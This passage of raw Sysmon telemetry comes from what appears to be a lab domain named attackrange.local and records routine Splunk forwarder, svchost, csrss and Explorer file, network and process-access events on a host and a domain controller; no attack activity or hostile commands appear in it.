23542300x800000000000000081976Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:53.247{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=401177E1A0709760C57561E748D4EE39,SHA256=8C4BBA63AEF43F7761B0F31D828A563BCA4A01627A98791E85BF1AE0F3874A9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104043Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:54.591{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC33AE35A2CFB671E5818F0C3C61C457,SHA256=C3B46A3C23D403E22B14C66B379E406024FB67E360F6F3A26721136F969398ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081977Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:54.247{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5325ABEAD64CABD544270AD5530947ED,SHA256=380EF9FD98076B386B1DD5510FCF37D99E1745D2DC6E30C51B332506DE76D299,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104044Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:55.591{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98D8371BD997939D5778C571CBEB4258,SHA256=B668B006958C126715AE901D8ACB727EDDCCE60ECD998E8685D30AB22F0D661C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081978Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:55.278{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13458AB6F022C3103EFA76FF9AA37AE3,SHA256=1276F77D82152ED6CDD4285E9AD9A776445B1F44BB8876470A93A4B1BBB692ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104046Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:56.873{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104045Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:56.623{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDCA1DBC8969FCA29E1E23FCC2E5DC43,SHA256=37E4924A610982D117C0CE54D9808E7F13B9877FCB57B5B2804E6E9EFD46CBFD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081980Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:53.722{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50066-false10.0.1.12-8000- 23542300x800000000000000081979Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:56.311{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE51B0D11305D81DFC727379AF7481CA,SHA256=C1462B51240066E02542ADCF2F464B0ADD82DDDBA618BA549AFE9D84BDE5C9FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104049Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:57.623{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADC2811C6005FF6716C6484F9E3A9565,SHA256=F78D86BB342FB6EAC1861119984DDC33D8FBCDD8105EFEC15FBBD7F90ACA549D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104048Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:57.623{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\new 2@2021-10-04_075343MD5=F11AF900F15215D81245B000809E7BE8,SHA256=79152EFEFD6F3C958CDB4B2FAA6FF2A1F18FAB55EBE28B9873154DEC9BBA37EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081981Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:57.358{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F21FDBD35B9E3A62E5B320BE18A68AB,SHA256=E1C6C5ECFFBD0B50092E8A199E86B2102D0D60D3E853B9EB7A856B6B446C3DDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104047Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:55.407{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49572-false10.0.1.12-8000- 10341000x8000000000000000104062Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.702{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B316-615A-E201-00000000FC01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104061Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.702{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104060Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.702{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104059Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.702{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104058Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.702{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B316-615A-E201-00000000FC01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104057Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.702{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104056Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.702{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B316-615A-E201-00000000FC01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104055Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.703{58E9C193-B316-615A-E201-00000000FC01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000104054Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.686{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104053Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.686{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104052Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.686{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104051Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.655{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEA24A53AD9CB4D7B6C9389DD90FCEC1,SHA256=6EB0FB1C5451839E80A3374D8212232E98D5FCA300BC76A8DFF26FC1B6A53131,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081982Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.358{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAC6A8C47FD4DCC294A5B7C4B13ABBF5,SHA256=371F28D5E7D9D68DB0A3188569473849D941A876644873F77825324ED42D7384,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104050Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:57.096{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49573-false10.0.1.12-8089- 10341000x8000000000000000104074Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:59.780{58E9C193-B317-615A-E301-00000000FC01}69926972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104073Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:59.686{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=147455C09CDFEEE5D46B469E9195D0A4,SHA256=529DB98269365229A0E16FCAE929C96E9758F5E0EEC27B72DE3871160AFA1D63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081996Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:59.358{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4273218A6A89623DC8CCA1B41E5B77AE,SHA256=7143B4CD3B83F4075CF94DAB04DE75D124BBC48D3AFBF67A4E38DCF08F9C05EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104072Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:59.592{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B317-615A-E301-00000000FC01}6992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104071Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:59.592{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104070Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:59.592{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104069Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:59.592{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104068Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:59.592{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104067Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:59.592{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B317-615A-E301-00000000FC01}6992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104066Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:59.592{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B317-615A-E301-00000000FC01}6992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 